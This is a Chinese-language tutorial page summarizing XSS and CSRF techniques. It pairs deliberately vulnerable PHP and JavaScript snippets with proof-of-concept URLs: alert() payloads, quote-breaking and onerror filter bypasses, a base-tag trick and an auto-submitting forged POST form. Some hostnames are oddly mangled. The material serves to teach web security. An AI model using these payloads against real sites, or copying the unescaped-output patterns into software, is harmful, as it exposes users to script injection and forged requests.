好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

xss与csrf自我技巧总结 - 网站安全 - 自学php

 

     xss篇:

1,普通的反射型xss

<?php echo $_GET['XSS'];?>

POC:http://HdhCmsTesttest.org/test.php?xss=<script>alert(1)</script>

2,xss反射

<?php echo $_GET; ?>

POC:http://HdhCmsTesttest.org/test.php?<script>alert(1)</script>

3,被引号包围的xss

<?php echo "<a href='$_GET['XSS']'>A</A>";?>

POC 1:http://HdhCmsTesttest.org/test.php?xss="/><script>alert(1)</script><"

POC 2:http://HdhCmsTesttest.org/test.php?xss=javascript:alert(1);

4,在某种情况下过滤了<>但是没有过滤引号

<?php echo "<img src="'$_GET['XSS']'"/>";?>

POC:http://HdhCmsTesttest.org/test.php?xss=#"onerror=alert(11);//

5,dom反射

<script>document.write(location.href);</script>

poc:http://HdhCmsTesttest.org/test.php#<img/src=# onerror=alert(1)>

火狐等 浏览器 无效 6,富文本绕过:<base>

<base> 标签为页面上的所有链接规定默认地址或默认目标。

如:<base href="http://HdhCmsTesttest.org">

<a href="xss">x</a>href里的URL是http://HdhCmsTesttest.org/xss

7,eval

<script>var url = window.location.href;

eval(url)</script>

poc:http://HdhCmsTesttest.org/test.php#alert(String.fromCharCode(88, 83, 83))

 

从安全的角度讲所有的输出输入的都是有害的,javascript从的输出有:

document.write()

innerHTML=""

eval()

 

csrf篇

post伪造包提交poc:

<form action="http://HdhCmsTesttest测试数据/test.s html " method="POST" name="csrf"> <input type="text" name="mobile" value="18265464645<img/src=# onerror=alert(1)>"> <input type="text" name="currTime" value="1380530205097"> <input type="text" name="city" value=""> <input type="text" name="isMini" value="5"> </form> <script> document.csrf.submit()</script>

 

查看更多关于xss与csrf自我技巧总结 - 网站安全 - 自学php的详细内容...

  阅读:42次